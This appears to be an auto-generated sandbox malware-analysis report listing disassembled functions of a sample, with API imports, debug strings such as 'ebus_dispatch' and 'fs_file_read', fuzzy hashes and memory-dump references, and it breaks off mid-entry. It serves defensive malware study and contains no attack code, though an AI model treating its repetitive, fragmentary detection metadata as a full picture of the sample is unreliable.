Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: memsetstrchr
String ID: [D] (%s) -> %s$sam3_recv_rsp
API String ID: 2564583029-4292814133
Opcode ID: e1d76a2a5c28645df0434631951a6c217f5af291312e21c2b1f087e674da43f9
Instruction ID: f423779af190e7f2cce369ec6624b0c3b4a45cfcb93e50db58edfe0f6e0951d1
Opcode Fuzzy Hash: e1d76a2a5c28645df0434631951a6c217f5af291312e21c2b1f087e674da43f9
Instruction Fuzzy Hash: 5F21A11BB0E68642FA27572A68B437915405F637F4E184331EE7E4B7C3DE1CE442930A

Function 00007FFDA55AA250 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFDA55AA289
LeaveCriticalSection.KERNEL32 ref: 00007FFDA55AA30B

Strings

[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFDA55AA2F6
ebus_dispatch, xrefs: 00007FFDA55AA2EF

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: a91faa0a071495fb7360876c82dafc1f145316e459933f77a033ed3725372526
Instruction ID: d71e836a0e1b507b99465d689bef9bf714c314ddbe84356163369dd74be3822e
Opcode Fuzzy Hash: a91faa0a071495fb7360876c82dafc1f145316e459933f77a033ed3725372526
Instruction Fuzzy Hash: 4B21C03AB0AA4A81EB528F11F86423DB3A0FB46F84F044531DA8D47BA5DF3DE891C704

Function 00007FFDA55D1290 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFDA55D12C9
LeaveCriticalSection.KERNEL32 ref: 00007FFDA55D134B

Strings

[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFDA55D1336
ebus_dispatch, xrefs: 00007FFDA55D132F

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: 11c8241b0c8d74f4a82eeb66a551a34d5c2a6ab914922c978e5f08f141abf23c
Instruction ID: fa61a3548de31cc8bf7b2814365631edbe2b2f1a39052e95a3c0d2dc1d03161b
Opcode Fuzzy Hash: 11c8241b0c8d74f4a82eeb66a551a34d5c2a6ab914922c978e5f08f141abf23c
Instruction Fuzzy Hash: 3D213A3BB0AB8AC5EB16CF52E86026C6360EB46F94B184131DE5D877A6DF3CE851C704

Function 00007FFDA5571290 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFDA55712C9
LeaveCriticalSection.KERNEL32 ref: 00007FFDA557134B

Strings

ebus_dispatch, xrefs: 00007FFDA557132F
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFDA5571336

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: bef6f1460e2736084dac7ed7a628b9831c3536a2aaf622b168460eda8f7bd86d
Instruction ID: 4cbd1fa12089ad95ae824e9d8f8b68a4629011dd44300364f9e1d30a86704bfa
Opcode Fuzzy Hash: bef6f1460e2736084dac7ed7a628b9831c3536a2aaf622b168460eda8f7bd86d
Instruction Fuzzy Hash: 86215E3AB0AA4AC1E7128F22F86026963A0FB46F94B544531DA9D877A5EF3CE851C704

Function 00007FFDAC125F90 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FFDAC125FC9
LeaveCriticalSection.KERNEL32 ref: 00007FFDAC12604B

Strings

ebus_dispatch, xrefs: 00007FFDAC12602F
[D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FFDAC126036

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
API String ID: 3168844106-1717220914
Opcode ID: e83c6fc510466567d90aaf3624748fadef7ce5cae9081cabc3fdd3160a3970bd
Instruction ID: 19eb6b671b5b58a694c0919d5079a58a543c120eca5d4c90ec6867227129533b
Opcode Fuzzy Hash: e83c6fc510466567d90aaf3624748fadef7ce5cae9081cabc3fdd3160a3970bd
Instruction Fuzzy Hash: 37216F37B1AA4281EB629F11F8A02297360FB94BE8F544131DA5D477A9DF3CD851C708

Function 00007FF70CAD51C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
Instruction ID: fe1f65c14c238ad030f72f028383c6bfad048c5a9a49d45c8c03a9ab6b157174
Opcode Fuzzy Hash: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
Instruction Fuzzy Hash: D4F05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD51B6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
Instruction ID: edea892eed85c3aa73837bb9288ca25a90f550bf0ef495c73371c9603cfb2e4f
Opcode Fuzzy Hash: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
Instruction Fuzzy Hash: 31F05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD51AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
Instruction ID: df86253267b4352bd481ded57288674701e48d15a90376b4d0ac9bce17ea870b
Opcode Fuzzy Hash: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
Instruction Fuzzy Hash: 8BF03AE3E1861241E953BA48B841BB996522F453A8E890531CD4A0A6D9AF3DA8868220

Function 00007FF70CAD51A2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
Instruction ID: cfdf1f16a7ac7219ca7e532a12c07b09e938049fbbe791067380b435343c6f3c
Opcode Fuzzy Hash: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
Instruction Fuzzy Hash: 8AF05EE3F1861741F953BA48BC40FBD96522F453B9EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD5198 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
Instruction ID: cf50a52bd8daeb98cf876d2080b421ac7aa0fe7ef3829162d273264ce4e04c98
Opcode Fuzzy Hash: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
Instruction Fuzzy Hash: 9BF05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD514D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
Instruction ID: cf50a52bd8daeb98cf876d2080b421ac7aa0fe7ef3829162d273264ce4e04c98
Opcode Fuzzy Hash: f7bf2250f83dda7b4050d48382f9d255a3ae4d373fcc780de3b5441e2bb50831
Instruction Fuzzy Hash: 9BF05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD557B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: c4566d302048c6188362bacd9c0eb47199ef46d1915068600f553c44cfa97314
Instruction ID: 417db1311b06611ab463073e23fe6cd1eda3710d96cdcfd615cf93db6c1dba3e
Opcode Fuzzy Hash: c4566d302048c6188362bacd9c0eb47199ef46d1915068600f553c44cfa97314
Instruction Fuzzy Hash: 51F05EE3F1851341F953BB48BC40FBD96522F453A8EC905328D4A0F6D9AF3DA9C69320

Function 00007FF70CAD5175 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
Instruction ID: fe1f65c14c238ad030f72f028383c6bfad048c5a9a49d45c8c03a9ab6b157174
Opcode Fuzzy Hash: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
Instruction Fuzzy Hash: D4F05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD516B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
Instruction ID: edea892eed85c3aa73837bb9288ca25a90f550bf0ef495c73371c9603cfb2e4f
Opcode Fuzzy Hash: 2de48659fd9b2c34c1948959248849a86e1d1f026478772961e51901de17ae7d
Instruction Fuzzy Hash: 31F05EE3F1861341F953BA48BC40FBD96522F453B8EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD5161 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
Instruction ID: df86253267b4352bd481ded57288674701e48d15a90376b4d0ac9bce17ea870b
Opcode Fuzzy Hash: b94846aad9ffa0726e945d6b0138e66da3c64d41ba801becf53d91a158c5c2cb
Instruction Fuzzy Hash: 8BF03AE3E1861241E953BA48B841BB996522F453A8E890531CD4A0A6D9AF3DA8868220

Function 00007FF70CAD5157 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
Instruction ID: cfdf1f16a7ac7219ca7e532a12c07b09e938049fbbe791067380b435343c6f3c
Opcode Fuzzy Hash: ca2303c8a4d4cd9f025dfdbcdf9563922afb20b95d5d53455a79939f79b2ee4b
Instruction Fuzzy Hash: 8AF05EE3F1861741F953BA48BC40FBD96522F453B9EC90531CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD5280 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd

Similarity

API ID: fclose
String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
API String ID: 3125558077-1073242539
Opcode ID: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
Instruction ID: fe1f65c14c238ad030f72f028383c6bfad048c5a9a49d45c8c03a9ab6b157174
Opcode Fuzzy Hash: 843c9d37efa13bae1efb7b07b9526f3bc61a19142bbcf8b7984d1d8eaec669d5
Instruction Fuzzy Hash: D4F05EE3F1861341F953BA48BC40FBD96522F453B8EC90532CD4A0E6D9AF3DA8C68320

Function 00007FF70CAD5276 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

fclose.MSVCRT ref: 00007FF70CAD5520

Strings

fs_file_read, xrefs: 00007FF70CAD5555
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF70CAD555C

Memory Dump Source

Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true

Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
